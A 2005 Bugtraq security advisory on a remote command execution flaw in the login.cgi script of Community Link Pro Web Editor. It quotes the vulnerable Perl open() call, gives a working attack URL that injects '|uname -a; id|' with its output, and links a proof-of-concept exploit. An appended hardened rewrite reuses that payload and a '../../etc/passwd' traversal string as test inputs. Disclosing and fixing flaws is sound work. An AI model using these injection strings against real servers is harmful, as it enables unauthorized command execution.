Message-ID: <42C2C1FA.2060302@mybox.it>
Date: Wed, 29 Jun 2005 15:44:58 +0000
From: mozako <mozako@...ox.it>
To: bugtraq@...urityfocus.com
Subject: [badroot security] Community link pro web editor: Remote command
 Execution


- -  - - - - - - - - - - - - - - - - - - - - - - - 
BADROOT SECURITY GROUP
Security Advisory 2005-#0x05
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
- -  - - - - - - - - - - - - - - - - - - - - - - - 

Authors .......   spher3 (spher3 at fatalimpulse dot net) 
	             mozako (admin at fatalimpulse dot net)
Date .............   29-06-2005
Product .......   Community Link Pro Web Editor (login.cgi)
Type ............   Remote Command Execution

o Description:
============================
login.cgi is a login script written in Perl by Community Link Pro Web Editor 
that allows a remote user to log in to his own personal page.

o Vulnerable Code:
============================
[...]
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");
foreach (<FILE2>) {
   print;
}
close(FILE2);
[...]

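This code performs no validation of the CGI query, specifically of
$FORM{'file'}. The value reaches Perl's two-argument open(), which treats
a file name ending in | as a command whose output is to be read. Without
that validation a remote user can run system commands (Remote Command
Execution Vulnerability) with a string
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.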

Example:

http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|

Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux
uid=72(apache) gid=72(apache) groups=72(apache)


o Proof of concept:
============================
You can download a simple PoC Exploit from: 
http://www.badroot.org/exploits/clogin.pl

Original ADV:
http://www.badroot.org/advisories/SA0x05
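
A hardened form of the file read shown under "Vulnerable Code", as an added example that is not part of the original advisory or the product's own code. The function name read_member_file, the allowlist pattern and the sample directory are assumptions made for illustration.

```perl
# Added example (not the product's code): hardened version of the file read
# in login.cgi. read_member_file() and the sample inputs are hypothetical.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);

# Return the file's contents, or undef if the request is rejected.
sub read_member_file {
    my ($memberspath, $username, $file) = @_;

    # Allowlist both path components: no '|', ';', '/', spaces or leading dots.
    for my $part ($username, $file) {
        return undef unless defined $part
            && $part =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    }

    # Resolve symlinks and confirm the target stays inside the members directory.
    my $base = realpath($memberspath);
    my $path = realpath("$memberspath/$username/$file");
    return undef unless defined $base && defined $path;
    return undef unless index($path, "$base/") == 0 && -f $path;

    # Three-argument open: the mode is fixed to '<', so the name is never
    # parsed for pipe or redirection characters.
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Constructed sample data: a temporary members directory with one page.
my $members = tempdir(CLEANUP => 1);
mkdir "$members/alice" or die "setup: $!";
open(my $out, '>', "$members/alice/index.html") or die "setup: $!";
print {$out} "<p>hello</p>\n";
close($out);

my @requests = (
    ['alice', 'index.html'],        # legitimate request
    ['',      '|uname -a; id|'],    # the advisory's example query values
    ['alice', '../../etc/passwd'],  # traversal attempt
);
for my $r (@requests) {
    my $data = read_member_file($members, @$r);
    printf "%-8s %-20s => %s\n", "'$r->[0]'", "'$r->[1]'",
        defined $data ? 'served' : 'rejected';
}
```

The three-argument open() alone removes the command execution; the allowlist and the realpath check additionally keep the read inside the members directory.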


